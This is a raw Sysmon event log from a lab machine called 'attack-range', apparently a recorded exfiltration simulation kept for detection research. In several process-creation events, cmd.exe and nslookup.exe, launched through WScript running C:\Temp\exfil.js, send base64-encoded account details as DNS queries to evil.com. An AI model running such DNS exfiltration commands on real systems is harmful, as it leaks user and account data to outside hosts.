\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196070Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.181{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196069Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.181{2E1864BB-17AE-629A-8D3E-000000005F02}73044636C:\Windows\system32\cmd.exe{2E1864BB-17AE-629A-8F3E-000000005F02}2872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196068Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.183{2E1864BB-17AE-629A-8F3E-000000005F02}2872C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AE-629A-8D3E-000000005F02}7304C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrnkc.tmp 2>&1 10341000x8000000000000000196067Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.118{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-8E3E-000000005F02}5432C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196066Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.118{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AE-629A-8E3E-000000005F02}5432C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196065Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.118{2E1864BB-17AE-629A-8E3E-000000005F02}54323384C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-8D3E-000000005F02}7304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196064Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.112{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-8E3E-000000005F02}5432C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196063Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.096{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196062Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.096{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196061Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.096{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-8D3E-000000005F02}7304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196060Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.096{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196059Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.096{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.080{2E1864BB-17A1-629A-783D-000000005F02}55521292C:\Windows\System32\WScript.exe{2E1864BB-17AE-629A-8D3E-000000005F02}7304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.096{2E1864BB-17AE-629A-8D3E-000000005F02}7304C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvrnkc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.080{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldgkc.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000196055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.461{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52289- 354300x8000000000000000196054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.461{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52288- 354300x8000000000000000196053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.461{00000000-0000-0000-0000-000000000000}2384<unknown process>-udptruefalse127.0.0.1-52288-false127.0.0.1-53domain 354300x8000000000000000196052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.390{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52287- 354300x8000000000000000196051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.390{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52286- 354300x8000000000000000196050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.389{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52285- 354300x8000000000000000196049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.248{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52284- 354300x8000000000000000196048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.245{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52283- 354300x8000000000000000196047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.245{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52282- 354300x8000000000000000196046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.245{00000000-0000-0000-0000-000000000000}984<unknown process>-udptruefalse127.0.0.1-52282-false127.0.0.1-53domain 354300x8000000000000000196045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.061{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52281- 354300x8000000000000000196044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.061{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52280- 354300x8000000000000000196043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.060{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52279- 354300x8000000000000000196042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.060{00000000-0000-0000-0000-000000000000}5124<unknown process>-udptruefalse127.0.0.1-52279-false127.0.0.1-53domain 354300x8000000000000000196041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.893{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52278- 354300x8000000000000000196040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.890{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52277- 354300x8000000000000000196039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.886{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52276- 354300x8000000000000000196038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.886{00000000-0000-0000-0000-000000000000}7712<unknown process>-udptruefalse127.0.0.1-52276-false127.0.0.1-53domain 354300x8000000000000000196037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.801{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56348-false10.0.1.12-8000- 354300x8000000000000000196036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.743{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52275- 354300x8000000000000000196035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.743{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52274- 354300x8000000000000000196034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.739{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52273- 354300x8000000000000000196033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.739{00000000-0000-0000-0000-000000000000}3832<unknown process>-udptruefalse127.0.0.1-52273-false127.0.0.1-53domain 354300x8000000000000000196032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.614{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52272- 354300x8000000000000000196031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.614{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52271- 354300x8000000000000000196030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.614{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52270- 354300x8000000000000000196029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.614{00000000-0000-0000-0000-000000000000}32<unknown process>-udptruefalse127.0.0.1-52270-false127.0.0.1-53domain 10341000x8000000000000000196028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.033{2E1864BB-17AD-629A-8B3E-000000005F02}73241044C:\Windows\system32\conhost.exe{2E1864BB-17AE-629A-8C3E-000000005F02}4468C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.033{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.033{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.033{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.033{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.033{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AE-629A-8C3E-000000005F02}4468C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.033{2E1864BB-17AD-629A-8A3E-000000005F02}76206168C:\Windows\system32\cmd.exe{2E1864BB-17AE-629A-8C3E-000000005F02}4468C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.038{2E1864BB-17AE-629A-8C3E-000000005F02}4468C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy 